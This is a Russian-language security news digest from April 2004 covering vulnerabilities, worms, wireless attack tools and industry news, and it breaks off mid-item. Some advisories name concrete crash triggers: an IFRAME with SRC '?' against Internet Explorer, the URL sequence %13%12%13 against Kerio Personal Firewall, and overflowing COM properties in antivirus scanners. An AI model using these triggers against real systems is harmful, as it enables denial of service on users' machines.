9/04/2004 11:57 Опасные уязвимости в продуктах Cisco
Компания Cisco сообщила об обнаружении двух опасных уязвимостей в программном обеспечении оборудования для беспроводных локальных сетей. Речь идет о компонентах Wireless LAN Solutions Engine (WLSE) и Hosting Solution Engine (HSE). ПО WLSE представляет собой инструмент администрирования беспроводных сетей WLAN. Посредством данного продукта можно настраивать нужное количество точек доступа, выявлять ошибки в параметрах безопасности, следить за работой серверов, обнаруживать наиболее загруженные сегменты и т.д. Кроме того, WLSE позволяет создавать списки пользователей, привязанные к отдельным точкам доступа. Программная платформа WLSE поддерживает широкий спектр продукции Cisco - от коммутаторов и маршрутизаторов до беспроводных адаптеров. Компонент HSE, в свою очередь, представляет собой средство безопасного управления сетевой средой в центрах обработки данных. При помощи HSE отдельные группы сотрудников компании могут независимо друг от друга выполнять повседневные задачи управления в совместно используемой сетевой инфраструктуре. Как сообщается, уязвимости подвержены компоненты WLSE версий 2.0, 2.0.2, 2.5 и HSE версий 1.7, 1.7.1, 1.7.2, 1.7.3.
Источник

9/04/2004 11:23 Обнаружен первый троян, заражающий компьютеры с Mac OS X
Специализирующаяся на вопросах компьютерной безопасности фирма Intego предупреждает владельцев "Макинтошей" об обнаружении первого трояна, способного проникать на компьютеры под управлением операционной системы Mac OS X. Вредоносная программа, получившая название MP3Concept (MP3Virus.Gen), использует одну из уязвимостей в ОС, которая позволяет замаскировать приложение под другой тип данных. Как сообщается, код трояна внедряется внутрь ID3-тэгов МР3-файлов. При двойном щелчке на таком файле в операционной системе Mac OS X производится автоматическое выполнение внедренного в тэг кода и последующее воспроизведение аудиоинформации. Таким образом, владелец "Мака" сначала может даже и не понять, что, сам того не желая, запустил на свой компьютер вредоносную программу. Однако не заметить присутствие MP3Concept машине будет достаточно сложно. Дело в том, что троян способен удалять всю пользовательскую информацию с жестких дисков. Кроме того, MP3Concept рассылает свои копии по найденным на ПК жертвы адресам электронной почты и заражает файлы форматов MP3, JPEG, GIF или QuickTime.
Подробнее

9/04/2004 11:06 Netsky атаковал веб-сайты файлообменных сетей и хакеров
Главный веб-сайт файлообменной сети eDonkey оказался отрезанным от пользователей, но Kazaa пока держится. В начале этой недели на веб-сайты файлообменных сетей Kazaa и eDonkey наряду с тремя другими веб-сайтами обрушилась распределенная атака на отказ в обслуживании (DDoS), вызванная разными вариантами червя Netsky. Netsky.Q, впервые появившийся 29 марта, нацелен на определенные веб-сайты, распространяющие либо клиентское ПО для обмена файлами, либо хакерские инструменты. Kazaa и eDonkey — наиболее известные его мишени, и атака должна была продлиться не менее шести дней. Однако ввиду того, что червь атакует только главный адрес www.edonkey2000.com, адрес http://edonkey2000.com оставался доступным. Другой объект атаки, www.emule-project.net, также уже побывал в серьезных переделках и подготовился, создав зеркало своего сайта по адресу www.emule-project.org. Адреса www.cracks.st и www.cracks.am на момент написания статьи были недоступны. Веб-сайт Kazaa, похоже, остается единственной мишенью Netsky, выдержавшей первый день атаки.
Подробности

9/04/2004 10:43 Mail.Ru выпустил русский интернет-пейджер
Российский портал Mail.Ru выпустил первый русский интернет-пейджер "М-Агент". От своих зарубежных аналогов новый пейджер отличается, прежде всего, тем, что эмоции в нем можно выражать не только традиционными "смайликами", но также жестами. Создатели пейджера предусмотрительно разметили в списке "смайлики" для выражения особенно сильных эмоций - например, своему собеседнику можно переслать символическое изображение комбинации со средним пальцем руки, или просто показать маленькие желтые ягодицы. Остальной набор функций в целом соответствует традиционному, который представлен, в частности, в программе ICQ - "М-Агент" способен получать извещения о новых письмах (приходящих только на mail.ru), отправлять сообщения в офф-лайн и показывать статус абонентов. Кроме того, пейджер интегрирован со всеми сервисами Mail.Ru, включая службу погоды, чат, интернет-поиск и так далее. Программа работает под Windows, Linux и FreeBSD. C другими интернет-пейждерами она не совместима.
О клиенте

8/04/2004 21:15 Продлена поддержка FreeBSD 4.8
Продлили поддержку FreeBSD 4.8 еще на полгода. Т.е. будет и дальше развиваться ветка RELENG_4_8. В дальнейшем ветки будут получать один из трех уровней поддержки: lite, standard, extended, соответственно, 3, 6 и 12 месяцев со дня выхода. В общем-то, правильно делают, что отменяют поддержку старых версий, освобождая ресурсы для новых версий, но срок уж очень короткий. MS вот 5 лет на поддержке продукты держит.
Источник

8/04/2004 18:30 Очередная уязвимость в Internet Explorer
Тот же самый Emmanouel Kellinis обнаружил уязвимость в популярном (и не менее "дырявом) браузере Internet Explorer. Оказывается, использовав в коде тэга <IFRAME (тоже печально известном в прошлом) в качестве параметра SRC знак вопроса ("?") можно удалённо подвесить компьютер с этим браузером. Уязвимост якобы обнаружена и проверена в версии E6 6.0.2800.1106 128bit SP1.
Подробности

8/04/2004 17:55 Уязвимость в Kerio Personal Firewall
Emmanouel Kellinis из Лондонского университета сообщает об обнаружении уязвимости в популярном персональном файрволле Kerio Personal Firewall. Этот файрволл обычно обрабатывает URL, на которые находит ссылки в пользовательском браузере при помощи специального инструмента под названием web-filter, что помогает в блокировке всплывающих (pop-up) окон и прочих вредных Вэб-компонент, призванных "ухудшить" самочувствие пользователей. Как обнаружил автор, сформировав специальный URL можно вызвать отказ функционирования файрволла с падением GUI. Подобный URL должен содержать специальные символы, имеющие HEX-код %13%12%13.
Подробности

8/04/2004 15:09 35 лет первому RFC
Довольно любопытный факт из истории Интернет приводится на сайте bugtraq.ru. Оказывается, 7 апреля 1969 года был выпущен первый Request for Comments, посвященный описанию программного обеспечения, работающего на хостах тогда еще ARPANet. Любопытно, но RFC 4 датирован 24 марта 1969...
RFC1

8/04/2004 14:47 Программа для атаки беспроводных сетей на базе CISCO - Asleap.
Joshua Wright, сетевой администратор из университета Johnson & Wales, объявил о доступности программного продукта под названием Asleap, основное назначение которого - использование уязвимости прокотола аутентификации оборудования CISCO под названием LEAP. Как пишет автор, ему удавалось достичь скорости перебора паролей около 45 миллионов в секунду. Программа обладает большой функциональностью, в том числе - возможностью работы с беспроводными сетями (где, собственно, и применяется протокол LEAP). Для подбора паролей используется брут-форс метод с подбором паролей по словарю. Существует возможность монтирования удалённых дисков с большими словарями. Ранее была выпущена версия ПО для ОС Linux. После выхода версии 1.0 автор портировал свой продукт для ОС Win32. Для пользователей этой платформы для обеспечения доступа к беспроводной сети предлагается использовать анализаторы протоколов (сниферы) сторонних производителей, например, AiroPeek NX.
Cайт проекта

8/04/2004 13:48 Cовместное заявление разработчиков дистрибутивов Linux
Поставщики систем GNU/Linux Debian, Mandrake, Red Hat и SUSE сделали совместное заявление об отчёте Forrester, озаглавленном "Является ли Linux более безопасной системой, чем Windows?", сообщает linux.org.ru. Несмотря на претензии отчёта на качественную оценку реакции поставщиков на серьёзные уязвимости, он рассматривает все уязвимости как одинаковые, независимо от их опасности для пользователей. В результате заключения Forrester имеют лишь ограниченное значение в реальном мире для покупателей, оценивающих вопрос об исправлении серьёзных уязвимостей с практической точки зрения.
Заявление

8/04/2004 13:10 Уязвимости во многих антивирусных сканерах
Исследователь компьютерной безопасности Rafel Ivgi из Израильской фирмы RISoft обнаружил целый букет уязвимостей во многих антивирусных сканерах. Сначала автором было объявлено о существовании уязвимости в Panda ActiveScan. Уязвимость связана с библиотекой "ascontrol.dll" и регистрируемой ей в реестре COM-объектов, которые затем могут быть созданы как локально, так и удалённо. В частности, вызвав свойство "Internacional" объекта "ASControl.ReportHebrew.1" с большим количеством символов можно получить условия для DoS из-за переполнения буфера. Другая уязвимость в этом сканере связана с функцией "SetSitesFile" и имеет аналогичные последствия. Следующим антивирусным сканером, в котором автор обнаружил уязвимость стал продукт компании Symantec. В этом случае уязвимость обнаружена также в библиотеке "rufsi.dll" и с COM-объектом, записывающемся в реестр Symantec.SymVAFileQuery.1. Передав в качестве парметра "file" функции "GetPrivateProfileString" очень длинную строку можно вызвать переполнение буфера. Последним пострадавшим оказался Mcafee FreeScan. В этом антивирусе уязвимость обнаружена в COM-объекте "McFreeScan.CoMcFreeScan.1" и его свойстве "ScanParam", при передаче которому очень длинного значения также возникает возможность переполнения буфера с выполнением происзвольного кода. Автором выпущены коды на Visual Basic для демонстрации уязвимостей.
Подробности

8/04/2004 12:25 Выход новой версии Real Player
Компания Real Networks выпустила новую версию своего медиаплеера и заявила, что это первый в мире бесплатный плеер, поддерживающий все основные форматы - RealAudio, RealVideo, Windows Media, MP3, QuickTime MPEG-4 и AAC – формат, используемый плеером iTunes от Apple. По словам компании, в новой версии улучшены характеристики обработки аудио- и видеопотока, а также функции быстрой перемотки вперёд и назад. Пока выпущены версии для английского, немецкого, британского и североамериканского рынков. Версии на французском, испанском, бразильском португальском, корейском и китайском языках должны появиться летом. Хотелось бы заметить, что помимо описанных выше улучшений выпуск новой версии также закрывает брешь, обнаруженную в предыдущих версиях Real Player Марком Литчфилдом (Mark Litchfield). Уязвимость связана с некорректной обработкой медиа-файлов формата R3T соответствующим плагином и приводит к переполнению буфера. Уязвимости подвержены версии RealPlayer 8, RealOne Player, RealOne Player v2 для платформы Windows при наличии соответствующего плагина. Также не исключается наличие уязвимости в RealPlayer 10 Beta и ReaPlayer Enterprise.
Подробности

8/04/2004 12:13 В сети «Би Лайн» снова сбой
В сети сотовой связи «Би Лайн GSM» сегодня случился очередной сбой. Абоненты, купившие карточки экспресс-оплаты стоимостью 5 и 10 у.е., столкнулись с трудностями при их активации – уплаченные деньги не поступают на счет. По поводу того, что именно послужило причиной возникновения проблем, мнения сотрудников компании расходятся. По словам одного из представителей абонентской службы, возможно, произошел сбой в системе биллинга. На вопрос корреспондента CNews.ru о том, как много абонентов пострадало в результате этого сбоя, в абонентской службе сообщили, что «звонки с такими запросами были». Похоже, что на данный момент у представителей компании нет единого мнения относительно того, что же собственно произошло. Как стало известно CNews.ru, одному из абонентов, столкнувшемуся с проблемой при активации карты, представитель абонентской службы пояснил, что в продажу поступила партия незарегистрированных карт экспресс-оплаты стоимостью 5 и 10 у. е.
Источник

8/04/2004 11:39 Lovesan не виноват в энергетической аварии на восточном побережье США
Причиной масштабного отключения электроэнергии в США и Канаде в августе прошлого года стали технические сбои и человеческий фактор, а не интернет-червь Lovesan (MSBlast). К такому выводу пришли члены специальной следственной комиссии, сообщает CNET News. Крупнейшая энергетическая авария на территории Северной Америки произошла 14 августа прошлого года. Несмотря на то, что в ходе аварии из строя вышло несколько компьютерных систем, рабочая группа в составе представителей федеральной комиссии по управлению энергетикой (FERC) и американско-канадского управления энергосистемами «не обнаружила свидетельств причастности вредоносных программ к отключению энергии». «Доказательств того, что отключение энергии вызвано червем или вирусом, распространявшемся в интернете, нет», - говорится в докладе комиссии. Члены комиссии также заявили о непричастности к отключению электроэнергии хакеров из террористической организации «Аль-Каеда», которая, по некоторым данным, даже брала на себя ответственность за события 14 августа прошлого года. Таким образом, выводы комиссии дублируют заключения, к которым пришли участники внутриведомственного расследования в ноябре прошлого года. Главными причинами аварии названы неисправности систем и ошибки персонала компаний Midwest ISO и FirstEnergy, которые наряду с еще пятью фирмами занимаются обеспечением энергетических объектов на Северо-Востоке и Среднем Западе США. О надвигающейся аварии инженеров могла оповестить созданная Midwest ISO система раннего предупреждения. Однако из-за возникших в ней сбоев и того, что обслуживающий ее сотрудник в критический момент отправился на ланч, своевременного оповещения не произошло. Одновременно с неполадками в продуктах Midwest ISO проблемы возникли и в обеспечении производства FirstEnergy. О возможной связи между энергетической аварией в США и вирусом MSBlast заявлял и руководитель антивирусных исследований «Лаборатории Касперского» Евгений Касперский.
Источник

8/04/2004 11:07 Универсальный уничтожитель винчестеров
Это интереснейшее устройство (AML-6KG) выпускается фирмой Applied Magnetics Laboratory и представляет собой небольшую металлическую лопатку, на всей поверхности которой нанесены предупредительные надписи, чтобы никто случайно не приблизил это устройство к винчестеру, дискете, кассете или другому носителю, использующему магнитную запись. Магнитные полюса AML-6KG создают поле с индукцией более 8000 Гауссов. Чтобы быть уверенным в том, что все данные полностью удалены и уже не могут быть прочитаны никаким, даже самым чувствительным оборудованием, рекомендуется провести "уничтожителем" два раза - вперед и назад. Это нужно, чтобы магнитное поле прошло по носителю с разных сторон. Согласно информации на сайте компании, их продукт превосходит даже требования самого секретного ведоства США - Национального агентства безопасности. AML-6KG имеет длину 18 сантиметров, весит чуть больше 150 г и комплектуется стальной коробкой, которая обеспечивает защиту от магнитного излучения.
Сайт производителя

7/04/2004 14:56 Уязвимость в Citrix MetaFrame Password Manager
Уязвимость обнаружена в Citrix MetaFrame Password Manager. Программное обеспечение в некоторых ситуациях хранит пароль в незашифрованном виде. Обычно, пароль хранится в зашифрованном виде. Однако, если агент не конфигурирован как центральное хранилище мандатов (sync point) и пользователь запустил First Time User Wizard, пароль, введенный сразу после запуска мастера не будет зашифрован. Выпущена обновлённая версия ПО.
Подробности

7/04/2004 13:45 Обновление Mac OS X
Компания Apple сообщает об обновлении, выпущенном для ОС, поддерживаемой этой компанией для платформы Mac под названием Mac OS X. Выпущенное обновление APPLE-SA-2004-04-05 связано с устранением критических уязвимостей, обнаруженных в ОС. Как следует из описания, закрыты следующие уязвимости: системы печати CUPS (Common Unix Printing System), библиотеки обработки XML-документов libxml2, почтовой системы (некорректная обработка специальных HTML-сообщений), службы OpenSSL (созлдание криптозащищённого обмена между клиентом и серевером через открытые сети). Обновление предназначено для версий ОС: Mac OS X 10.2.8 "Jaguar/ Mac OS X 10.2.8 Server - файл "SecUpd2004-04-05Jag.dmg", Mac OS X 10.3.3 "Panther"/Mac OS X 10.3.3 Server - файл "SecUpd2004-04-05Pan.dmg".
Подробности

7/04/2004 12:26 Linux на Sony PlayStation2
На сайте LinuxDevcenter, принадлежащем известнейшему в компьютерном мире издательству O'Reilly опубликована статья John Littler о том, как можно заставить игровую приставку Sony PlayStation2 (SP2). Следуя указаниям автора можно получить работоспособный компьютер под управлением ОС Linux. Описание установки базируется на ОС Red Hat Linux 6.2 (ядро 2.2.1), вернее, на его японском варианте под названием Kondara Linux.
Подробности

7/04/2004 12:10 Домену RU – десять лет!
Ранее мы уже сообщали, что нашему родному домену исполняется 10 лет. Сегодня как раз тот самый день, когда отмечается день рождения домена RU. 7 апреля 1994 г. международная организация InterNIC зарегистрировала домен верхнего уровня RU. Однако, как считают специалисты, это событие можно сравнить не с днем рождения, а с регистрацией младенца в загсе, поскольку реально жизнь российской Сети началась раньше. Как минимум два события, случившиеся в далеком уже 1990 году, могут считаться именно днем рождения российского Интернета: первый сеанс телекоммуникационной связи с Финляндией и регистрация домена SU для Советского Союза. К слову, СССР просуществовал после этого недолго, а вот домен SU многие ветераны Рунета еще помнят... Потом этот SU в полном соответствии с политической ситуацией на одной шестой части суши разделился на 15 доменов для бывших союзных республик, ставших независимыми государствами. Аудитория российского Интернета сегодня составляет 14,6 млн человек, или 13% населения страны. За десять лет в зоне RU было зарегистрировано 235 тыс. доменов (данные RU-Center), а объем русскоязычного Интернета оценивается в 350 млн документов. Как считают в RU-Center, большинство россиян доверяют национальному домену и в основном регистрируют свои сайты в зоне RU. В доменной зоне COM зарегистрировано еще 27 тыс. русскоязычных доменов.
Этапы славного пути

7/04/2004 11:26 Готовится к выпуску MS Office 2004 для Macintosh
Как сообщили представители подразделения Microsoft Macintosh Business Unit (Mac BU), пакет Office 2004 для Macintosh выйдет во второй половине мая. Кроме англоязычной версии планируется выпустить варианты с интерфейсом на французском, немецком, итальянском, японском, испанском и шведском языках. "Подавляющее большинство отзывов пользователей бета-версий были положительными", - сообщил представитель Mac BU. По данным Jupiter Research, на 11% предприятий с годовым оборотом от 50 млн. долл. используется Office v. X, и еще на 8% планируют приобрести Office 2004 for Macintosh. "Microsoft многим обязана Apple, - заметил старший аналитик Jupiter Джо Уилкокс. - В частности, первыми успешными приложениями Microsoft стали Word и Excel для Macintosh, еще задолго до Windows-версий".
Источник

7/04/2004 11:13 Румынские и нигерийские мошенники разоряют интернет-магазины США
Более 40% преступлений, связанных с махинациями с банковскими картами на территории США, совершают граждане бывших югославских республик, Нигерии, Румынии, Пакистана и Индонезии. Онлайн-сделки, заключенные выходцами из этих стран, чаще всего оказываются незаконными, сообщает сайт MSNBC со ссылкой на исследование, выполненное компанией Cybersource. На долю жителей бывших югославских республик приходится 13% всех мошеннических онлайн-покупок. Для сравнения - американцы совершают лишь 1,7% таких преступлений. В целях предотвращения мошенничеств со стороны иностранцев многие онлайновые торговые компании предпочитают совершать сделки только в пределах своей страны. Основанием для этого является то, что международные покупки в 4 раза чаще сопровождаются мошенничеством. Представители Совета по вопросам рыночного риска считают, что онлайн-торговцам не стоит полностью отказываться от торговли с зарубежными покупателями. «Наша рекомендация - плавать всегда следует по всему миру. Но если вы плывете в опасное место, особо помечайте его для проверки», - заявила один из членов правления Совета Джули Фергюсон (Julie Ferguson). Пресс-секретарь компании Cybersource Брюс Фраймайер (Bruce Frymire) назвал несколько основных методов защиты от международных мошенников. Наиболее радикальным из них является блокировка доступа к сайту для граждан определенных государств. Кроме того, Фраймайер предлагает использовать специальное программное обеспечение, которое позволяет оценить степень риска при совершении той или иной транзакции.
Источник

7/04/2004 10:48 Пользователи радиоинтернета могут раскрыть хакерам все свои секреты
Путешествующие с ноутбуками бизнесмены, пользующиеся wi-fi (зона беспроводного доступа) для выхода в интернет, рискуют доверить корпоративные секреты своим конкурентам. В момент подключения жесткий диск их компьютера становится доступным для всех остальных пользователей сети, если она не защищена должным образом. По информации сайта ежедневной газеты Financial Times, внимание публики на эту проблему обратили специалисты по IT-безопасности, которые уверены, что для хакеров не составит труда воспользоваться такой ситуацией. Более того, используя точки доступа (приемопередатчики высокочастотных радиоволн), злоумышленники могут переписать на чужой компьютер какие угодно файлы. Подобное нередко происходит в Великобритании. Однако некоторые эксперты по радиоинтернету настаивают на том, что такие сети зачастую более надежны, чем кабельные. В wi-fi используется устойчивая к искажению данных, помехам, в том числе преднамеренным, и обнаружению технология Direct Sequence Spread Spectrum (DSSS). Вдобавок, пользователи беспроводной сети должны проходить аутентификацию по системному идентификатору. А для передачи особо важной информации существует режим шифровки сигнала дополнительным алгоритмом. Глава компании Orthus, специализирующейся на предоставлении услуг по IT-безопасности, Ричард Холлис (Richard Hollis) не говорит о том, как можно защититься от перехвата трафика. Однако чтобы исключить возможность несанкционированного проникновения в компьютер, по его мнению, достаточно системы межсетевой защиты Firewall и запрета на размещения файлов извне. Оборудование для доступа к беспроводному интернету достаточно часто размещается в гостиницах, аэропортах, вокзалах и других подобных местах, через которые проходит много людей с ноутбуками.
Подробности

6/04/2004 17:43 Уязвимость в Winamp
Группа исследователей безопасности из английской компании NGSSoftware сообщает об обнаружении уязвимости в популярном медиа-плеере Nullsoft Winamp. Уязвимость связана с некорректной обработкой мдеиа-файлов Fasttracker 2 (расширение '.xm'), из-за чего может возникнуть возможность перезаписи произвольной области памяти в куче (heap). Это может позволить выполнить произвольный код в системе с полномочиями пользователя, запустившего файл. Разумеется, для осуществления атаки злоумышленнику необходимо создать специальный файл и, например, при помощи HTML-документа вывести жертву на URL, содержащий этот файл. Уязвимость связана с библиотекой обработки медиа-файлов in_mod.dll и присутствует в версиях 2.91-5.02. Nullsoft уязвимость была устранена в вышедшей версии 5.03.
Подробное описание

6/04/2004 17:17 Инструмент для беспроводного доступа "Hotspotter"
Max Moser анонсировал новый инструмент, который позиционируется, как средство вторжения в беспроводные сети. Название ему дано Hotspotter. Как пишет сам автор, проникновение возможно независимо от применяемого механизма шифрования (EAP/TLS) и связано с некорректной реализацией программы обеспечения беспроводных клиентов в ОС Windows XP. Как пишет сам автор, эта уязвимость была ликвидирована в SP1. Инструмент свободен для скачивания. Наличие уязвимости позволяло проникнуть в беспроводную сеть, используя пустое значение сетевого имени (SSID).
Сайт проекта

6/04/2004 14:10 Создание почтовой системы на базе exim, dbmail, amavisd-new и postgresql
Ezzh написал статью, посвящённую построению полноценной и защищённой почтовой системы на базе связки Exim+DBMail+AmaviS-new+PostgreSQL. Целью статьи являлось описание создания простой для управления и масштабируемой почтовой системы под управлением ОС Linux с возможностью фильтрации почты, учитывающей индивидуальные пользовательские настройки. В качестве дистрибутива рассматривается дистрибутив Gentoo (что, впрочем, не мешает, исходя из описания, построить аналогичную систему на базе другого дистрибутива).
Статья

6/04/2004 13:58 Новая версия Windows ISA Server выйдет этим летом
Корпорация Microsoft подтвердила свое намерение выпустить этим летом новую версию Windows Internet and Security Acceleration (ISA) Server 2004. Одно из главных достоинств этого программного продукта, как отмечает компания, - простота использования в предприятиях малого и среднего бизнеса. Новая версия будет отличаться не только дизайном, но и более высокой надежностью, гибкостью и масштабируемостью, пишут обозреватели издания Vnunet. Будет расширен набор поддерживаемых межсетевых экранов и других средств безопасности, что представит пользователю возможность создания виртуальных частных сетей (VPN). Новая версия также предусматривает более глубокую интеграцию с другимим продуктами Microsoft - Internet Authentication Service, Exchange и Sharepoint Portal Server 2003. Для большего удобства использования были изменены инструменты управления и пользовательский интерфейс ISA Server. Например, новый редактор визуальной политики позволяет использовать готовые образцы политик из набора инструментов и предлагает пользователю разнообразные шаблоны и советы. Увеличится объем поддерживаемой оперативной памяти, будет усовершенствован механизм инспектирования HTTP, благодаря чему можно будет обрабатывать в пять раз больше данных. Эффективность возрастет и благодаря новой технологии "накачивания данных", которая позволит быстро пропускать потоки информации, не требующей инспектирования на уровне символов, и использует специальный карантинный клиент для данных, корторые необходимо тщательно инспектировать, пишет Vnunet.
Источник

6/04/2004 13:35 Microsoft распространила исходный код своего ПО бесплатно
Все, кто думал, что последняя выплата Microsoft корпорации Sun Microsystems кажется невероятной, были снова шокированы вчера, когда софтверный гигант сделал исходный код одного из своих продуктов бесплатно доступным в интернете. Как сообщил сайт SlashdotMicrosoft разместил код набора инструментов WiX – это Windows Installer XML - предназначенного для создания инсталляционных пакетов из исходного кода XML, на SourceForge.net, веб-сайте предоставляющем хостинг для проектов разработок ПО с открытым кодом. WiX распространяется под действием общей публичной лицензии, лицензии на открытый исходный код, изначально придуманной в IBM, заявил Джейсон Матусов (Jason Matusow), менеджер компании Microsoft по инициативам распространения исходного кода. «Это первый раз, когда мы опубликовали проект под действием лицензии на открытый код, это означает, что проект одобрен людьми с Opensource.org», - заявил он. Этот шаг не говорит о том, что компания изменила своё отношение к исходному коду, по его словам. В течение многих лет Microsoft выпускал исходный код под действием различных лицензий распространения кода, которые были написаны самой компанией, подчеркнул Матусов. Компания продолжит выпускать исходный код под действием подобных лицензий, быть может той же общей публичной лицензии (Common Public License), однако у неё нет планов на GNU GPL, под действием которой распространяется Linux, поскольку Microsoft относится к GPL отрицательно. В компании посчитали, что CPL будет самой подходящий лицензией для WiX, по словам Матусова. Решение разместить код на сайте SourceForge было принято по причине того, что сайт очень широко используется Windows-сообществом.
Источник

6/04/2004 13:17 В интернете появилась новая версия червя Sober
Специалисты компании F-Secure предупреждают об обнаружении очередной, шестой по счету версии вредоносной программы Sober. Как и две предшествующие модификации, червь Sober.F был выпущен во Всемирную сеть в воскресенье, то есть перед началом рабочей недели. Следует напомнить, что вирус Sober впервые появился в конце октября прошлого года. Червь написан на языке Visual Basic и упакован утилитой UPX, а его родиной, по всей видимости, является Германия. Вариант вредоносной программы с индексом "F" мало чем отличается от более ранних версий. В частности, червь распространяется по электронной почте в письмах с различными заголовками и содержанием. Для отправки инфицированных сообщений используется встроенный SMTP-сервер, необходимые адреса при этом извлекаются из определенных файлов, найденных на жестком диске зараженного компьютера. После неосторожного запуска вложенного файла, всегда имеющего расширение .ехе и размер 42496 байт, вредоносная программа прописывает себя в системном реестре, обеспечивая, тем самым, себе автоматический запуск при каждой загрузке Windows, и активирует процедуры размножения. Кроме того, Sober.F имеет и одну характерную особенность. Червь непрерывно пытается найти на доступных носителях файл с именем ZHCARXXI.VVX. При обнаружении такового вредоносная программа сразу же выгружается из памяти. Если же указанный файл находится на жестком диске ПК в момент установки вируса в систему, копирования вредоносного вложения на винчестер не производится.
Подробности

6/04/2004 12:36 Начинается бета-тестирование двух продуктов семейства Kaspersky® Anti-Spam 2.0
"Лаборатория Касперского" объявила о начале бета-тестирования двух антиспамовых продуктов, разработанных специально для фильтрации нежелательной корреспонденции в корпоративных сетях и на уровне интернет-провайдеров - Kaspersky® Anti-Spam Enterprise Edition 2.0 и Kaspersky® Anti-Spam ISP Edition 2.0. Kaspersky Anti-Spam - это мощное средство противодействия спаму на основе многоуровневой системы фильтрации электронной почты. Пользователи Kaspersky Anti-Spam обеспечиваются обновлениями антиспамовой базы данных каждые 2 часа, что позволяет эффективно противостоять самым новым спам-эпидемиям. Интегрированный модуль управления, представленный веб-интерфейсом, дает системному администратору возможность оперативного изменения параметров работы программы из любой точки сети.
Подробности

6/04/2004 12:04 Американские ВВС провели двухнедельные учения по противостоянию компьютерным угрозам
Командование военно-воздушных сил США объявило об окончании двухнедельных учений, посвященных вопросам обеспечения безопасности компьютерных сетей. Результаты учений подтвердили способность военных противостоять самым разным типам атак, сообщается на официальном сайте американских ВВС. Учения, в которых принимали участие около 200 специалистов в области компьютерной безопасности, являлись частью масштабной акции «Черный демон», проводившейся руководством Министерства обороны США. В ходе акции военные отрабатывали действия, необходимые для преодоления последствий таких событий как DoS-атаки, сбои в работе межсетевых экранов, попытки незаконного доступа к данным. По словам руководителя учений, бригадного генерала Грегори Пауэра (Gregory H. Power), главной целью акции была подготовка личного состава к противостоянию компьютерным угрозам: «Я думаю, что самая главная цель - научить наших специалистов понимать, какого рода опасности угрожают сети вообще и сети ВВС в частности». Отрабатывать нештатные ситуации военно-воздушным специалистам помогали около 450 человек, в том числе сотрудники разведки, узла связи и авиационной Национальной гвардии. По словам представителя ВВС, нынешние учения стали свидетельством прогресса в деле противостояния компьютерным угрозам в сравнении с аналогичным мероприятием двухгодичной давности: «ВВС будет продолжать укреплять свою оборону. Мы уверены, что способны ответить на любые новые угрозы по мере их появления»
Подробности

5/04/2004 16:21 Программное обеспечение Wal-Mart в роли мошенника.
800000 американцев обсчитали в крупнейшей сети универмагов Wal-Mart. Из-за неполадок в программном обеспечении, обслуживающем электронные расчеты с помощью кредитных карт, клиентам этой сети универмагов приходилось в среду и в четверг на прошлой неделе платить в 2-3 раза больше за приобретенные товары. В фирме First Data, которая разработала программу, сообщают, что к понедельнику неполадки удалось предотвратить, однако никаких подробностей по поводу того, скольких американцев и на какую сумму обсчитала их система, не сообщается. Известно, что проблемы возникли у владельцев карт Visa и Mastercard, сообщает АР. Пресс-секретарь First Data Стэйси Басби рекомендует всем посетителям Wal-Mart, делавшим покупки 31 марта, проверить свои счета и связаться с компанией. В универмагах Wal-Mart с понедельника висят плакаты с аналогичными призывами. Компания First Data занимается электронными расчетами сетей универмагов с банками, клиенты которых расплачиваются с помощью электронных карт. В компании работает более 30 тыс. человек, отделения First Data есть в 195 странах мира.
Источник - http://www.crime-research.ru

5/04/2004 15:46 Недельный отчет о вирусах Panda Software.
Опубликован традиционный еженедельный отчёт вирусной активности прошедшей недели от антвирусной компани Panda Software. Рассмотрены пять червей, распространяющихся по электронной почте - версии R и Q Netsky, V и U Bagle и E Sober, а также троянца Seeker.O.
Подробнее - http://www.viruslab.ru/press/index.php?go=show&num=262

5/04/2004 15:18 Что ожидается в OpenBSD 3.5.
На питесрком сайте, посвящённом ОС Linux опубликована статья Mike Belopuhov о том, что ожидается нвого (и улучшенного) в готовящейся к выпуску новой версии ОС OpenBSD - 3.5, релиз которой намечен на 1 мая текущего года.
Статья - http://www.linux.spb.ru/modules/wfsection/article.php?articleid=17

5/04/2004 15:03 MSBlast: раз – и готово!
Среднестатистический компьютер, подключенный к интернету, «ловит» свою копию вируса Blaster уже через секунду после входа в сеть. Как сообщает ZDNet UK, данные, собранные компанией Microsoft, говорят в пользу того, что с августа прошлого года, когда началась эпидемия MSBlast, как минимум восьми миллионам пользователей была наглядно продемонстрирована цена безалаберности. В своих прикидках аналитики Microsoft опирались на статистику использования сервиса Windows Update, точнее – того раздела, что был специально создан для «лечения» машин, получивших свою копию «бластера». Так вот, с января 2004 года более 16 миллионов пользователей, заглянувших на сайт Microsoft, были заражены одной из версий MSBlast. Даже по самым оптимистичным оценкам, количество этих машин не может быть меньше восьми миллионов, но в Microsoft все же полагают, что зараженных было вдвое больше. Разница в оценках возникла вследствие того, что Microsoft не отслеживает специально каждую зараженную машину, а просто считает количество «лечебных» сессий. Вполне естественно предположить, что какая-то часть пользователей могла прерывать процесс установки патча на середине, чтобы вернуться на сервер вновь и, таким образом, была подсчитана несколько раз.
Источник - http://www.internet.ru

5/04/2004 14:16 Украинскому хакеру грозит 40 лет тюрьмы.
Сегодня перед окружным судом калифорнийского города Сан-Хосе предстанет гражданин Украины Максим Ковальчук. В мае прошлого года по просьбе американских властей он был арестован в Таиланде, куда приехал с женой на отдых, а позже экстрадирован в США, пишут сегодняшние "Известия". Максима Ковальчука обвиняют в незаконном распространении пиратских компьютерных программ, что, по версии следствия, нанесло компаниям-производителям ущерб в $3 млн. Если обвинение сможет отстоять свою версию в суде, хакер может провести в тюрьме до 40 лет и заплатить штраф в сумме до $500 тыс., сообщает Associated Press. Дата слушанья пока не назначена, а сегодня специальное заседание суда должно определить, будет ли хакер выпущен под залог. С точки зрения российского и украинского обывателя, г-н Ковальчук не совершил ничего сверхъестественного, отмечают обозреватели. Он незаконно копировал и продавал нелицензионное программное обеспечение, которое можно купить в Москве и Киеве буквально на любом рынке. За нарушение авторских прав в России строго не судят. Согласно отечественному УК, максимальное наказание за этот вид преступления - 5 лет лишения свободы. Но обычно российские суды ограничиваются штрафами и условными приговорами. Для Америки компьютерное пиратство является тяжким преступлением. Именно поэтому для поимки Максима Ковальчука американские спецслужбы разработали настоящую спецоперацию. 26-летнего уроженца Тернополя арестовали в одном из кафе Бангкока вечером 20 мая 2003 года. "С начала 2003 года агенты специальных подразделений отслеживали всю электронную переписку Ковальчука, - сообщил представитель прокуратуры Северного округа штата Калифония Мэтью Джэкобс. - В апреле Ковальчук забронировал по электронной почте номера в двух гостинцах Таиланда. Следствием этого и стало его незамедлительное 